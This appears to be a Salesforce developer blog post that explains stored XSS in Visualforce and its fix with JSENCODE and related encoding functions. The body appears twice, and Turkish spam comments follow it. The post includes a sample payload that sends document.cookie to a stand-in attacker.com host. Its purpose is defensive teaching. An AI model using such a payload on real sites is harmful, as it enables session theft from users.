Continuing to my previous post , this time I would to share the knowledge on Stored XSS part.
So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.
In other words :
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."
Let's have an example:
<apex:page>
Now suppose
Account Name is : testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';
So this account name will always be on the page in script block and whenever the commandLink will be clicked "crossXSS" will be called and will be in the following manner:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';
So again you can see here all the cookies will be sent to the attackers.com site.
What I suggested in previous blog , repeating all those things again :).
To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.
So the code explained above can be updated as :
var xssExample = '{!JSENCODE(Account.Name})' ;
So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE: If building a URL on page.
Please feel free to ask the questions/doubts. Suggestions are appreciated.
So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.
In other words :
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."
Let's have an example:
<apex:page>
<script>
function crossXSS()
{
var xssExample = '{!Account.Name}' ;
}
</script>
<apex:form>
<apex:commandLink value="Click me" onClick="crossXSS();" />
</apex:form>
</apex:page>Now suppose
Account Name is : testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';
So this account name will always be on the page in script block and whenever the commandLink will be clicked "crossXSS" will be called and will be in the following manner:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';
So again you can see here all the cookies will be sent to the attackers.com site.
What I suggested in previous blog , repeating all those things again :).
To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.
So the code explained above can be updated as :
var xssExample = '{!JSENCODE(Account.Name})' ;
So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE: If building a URL on page.
Please feel free to ask the questions/doubts. Suggestions are appreciated.
var xssExample = '{!JSENCODE(Account.Name})' ;
ReplyDeleteInvalid argument!!!!!!
how to encode, i tried all the ways
Hi Amit, your order of closing bracket is wrong.
ReplyDeleteTry with {!JSENCODE(Account.Name)}
Hi I am using this to read the parameter.
ReplyDeleteBefore Passing to URL I Encode the parameter using JSENCODE in the javascript function
The following line in controller reads the parameter
String temp = System.currentPageReference().getParameters().get('Amt');
is there a risk?
thanks
Sri
Hi Srikanta M,
ReplyDeleteThere is no risk at all but if you want use this variable in a dynamic query then you need to "escapeSingleQuotes" like String.escapeSingleQuotes(temp) before using in dynamic SOQL.
Thanks
Deepak Choudhary
mersin
ReplyDeleteadana
aksaray
ankara
antalya
7LRVD
elazığ
ReplyDeletebilecik
kilis
sakarya
yozgat
G278T
https://titandijital.com.tr/
ReplyDeletebalıkesir parça eşya taşıma
eskişehir parça eşya taşıma
ardahan parça eşya taşıma
muş parça eşya taşıma
VWJM
54300
ReplyDeleteSoundcloud Reposts Satın Al
NWC Coin Hangi Borsada
Tiktok Takipçi Satın Al
Anc Coin Hangi Borsada
Bitcoin Kazanma
Youtube Beğeni Hilesi
Ön Satış Coin Nasıl Alınır
Görüntülü Sohbet Parasız
Alyattes Coin Hangi Borsada